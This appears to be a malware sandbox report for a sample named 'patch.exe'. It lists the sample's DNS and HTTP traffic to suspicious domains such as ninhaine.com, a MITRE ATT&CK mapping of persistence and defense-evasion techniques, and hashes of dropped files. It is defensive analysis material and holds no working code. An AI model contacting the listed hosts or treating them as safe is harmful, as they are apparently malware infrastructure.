GET http://ww82.ninhaine.com/HTTP Response
200 -
204.79.197.219:443https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdbtls, httppatch.exe2.8kB 10.9kB 17 21
HTTP Request
GET https://msdl.microsoft.com/download/symbols/index2.txtHTTP Response
404HTTP Request
GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdbHTTP Response
302HTTP Request
GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdbHTTP Response
302HTTP Request
GET https://msdl.microsoft.com/download/symbols/index2.txtHTTP Response
404HTTP Request
GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdbHTTP Response
302HTTP Request
GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdbHTTP Response
302 -
20.150.38.228:443https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9dtls, httppatch.exe338.9kB 18.1MB 7159 13004
HTTP Request
GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9dHTTP Response
200HTTP Request
GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=3UpCFLLohJBv6fYD47rr89qUp6hbrNh9jURupMeCcbM%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T02%3A49%3A09Z&ske=2024-12-27T03%3A49%3A09Z&sks=b&skv=2019-07-07&se=2024-12-26T04%3A19%3A29Z&sp=r&rscl=x-e2eid-c32417c5-144b4ca6-93d1b868-70da201b-session-67043d7f-3327490a-be498c32-8683bc9dHTTP Response
200 -
487 B 1.5kB 6 5
HTTP Request
GET http://ww53.ninhaine.com/HTTP Response
200 -
20.150.70.36:443https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9dtls, httppatch.exe27.2kB 1.1MB 507 756
HTTP Request
GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9dHTTP Response
200HTTP Request
GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=fbiR%2FAoUtr4Yr5cCbtF8Jq%2FvPQpO4WAU%2FzT5H47sbs0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T01%3A20%3A22Z&ske=2024-12-27T02%3A20%3A22Z&sks=b&skv=2019-07-07&se=2024-12-26T05%3A04%3A39Z&sp=r&rscl=x-e2eid-516686d6-a0884684-92c5e632-712025a1-session-6707c337-3327490a-be498c32-8683bc9dHTTP Response
200 -
2.3kB 4.3kB 19 21
-
475 B 2.4kB 7 7
HTTP Request
GET http://ww82.ninhaine.com/HTTP Response
200 -
423 B 1.5kB 6 5
HTTP Request
GET http://ww53.ninhaine.com/HTTP Response
200 -
399 B 1.7kB 4 4
HTTP Request
GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crlHTTP Response
200 -
393 B 1.7kB 4 4
HTTP Request
GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crlHTTP Response
200 -
1.8kB 4.3kB 18 19
-
423 B 1.5kB 6 5
HTTP Request
GET http://ww53.ninhaine.com/HTTP Response
200 -
2.1kB 4.1kB 17 16
-
529 B 2.8kB 7 6
HTTP Request
GET http://ww53.ninhaine.com/HTTP Response
200
-
58 B 58 B 1 1
DNS Request
ninhaine.com
-
62 B 135 B 1 1
DNS Request
2makestorage.com
-
58 B 117 B 1 1
DNS Request
nisdably.com
-
95 B 95 B 1 1
DNS Request
845d549f-5f7c-4d60-b3b5-523d34d5069e.ninhaine.com
-
66 B 82 B 1 1
DNS Request
server3.ninhaine.com
DNS Response
46.8.8.145
-
63 B 148 B 1 1
DNS Request
ww53.ninhaine.com
DNS Response
172.104.149.86172.104.251.198139.162.181.76
-
63 B 105 B 1 1
DNS Request
ww82.ninhaine.com
DNS Response
199.59.243.227
-
64 B 182 B 1 1
DNS Request
msdl.microsoft.com
DNS Response
204.79.197.219
-
92 B 231 B 1 1
DNS Request
vsblobprodscussu5shard30.blob.core.windows.net
DNS Response
20.150.38.22820.150.70.3620.150.79.68
-
92 B 231 B 1 1
DNS Request
vsblobprodscussu5shard20.blob.core.windows.net
DNS Response
20.150.70.3620.150.38.22820.150.79.68
-
63 B 162 B 1 1
DNS Request
crl.microsoft.com
DNS Response
88.221.134.8388.221.134.146
-
63 B 230 B 1 1
DNS Request
www.microsoft.com
DNS Response
95.100.245.144
-
59 B 138 B 1 1
DNS Request
spolaect.info
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
Filesize8.3MB
MD5fd2727132edd0b59fa33733daa11d9ef
SHA163e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA2563a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA5123e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e
-
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Filesize492KB
MD5fafbf2197151d5ce947872a4b0bcbe16
SHA1a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
94KB
MD5d98e78fd57db58a11f880b45bb659767
SHA1ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
1.5MB
MD5f0616fa8bc54ece07e3107057f74e4db
SHA1b33995c4f9a004b7d806c4bb36040ee844781fca
SHA2566e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA51215242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
-
Filesize
5.3MB
MD51afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
Filesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
Filesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
Filesize
4.4MB
MD508f5c8339bbf8133aa584b9ab669ad89
SHA151ded7dfbb52a4ef1e7231768d74004fdb7bfdd9
SHA256316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5
SHA512a90de73579a36127fdc380f3981f200123f0aedb8c21157addbbcf2bd966984576ae384102d674f622c348e3aaff3fadabc23204ab01caec0dc154b3fa7d76cd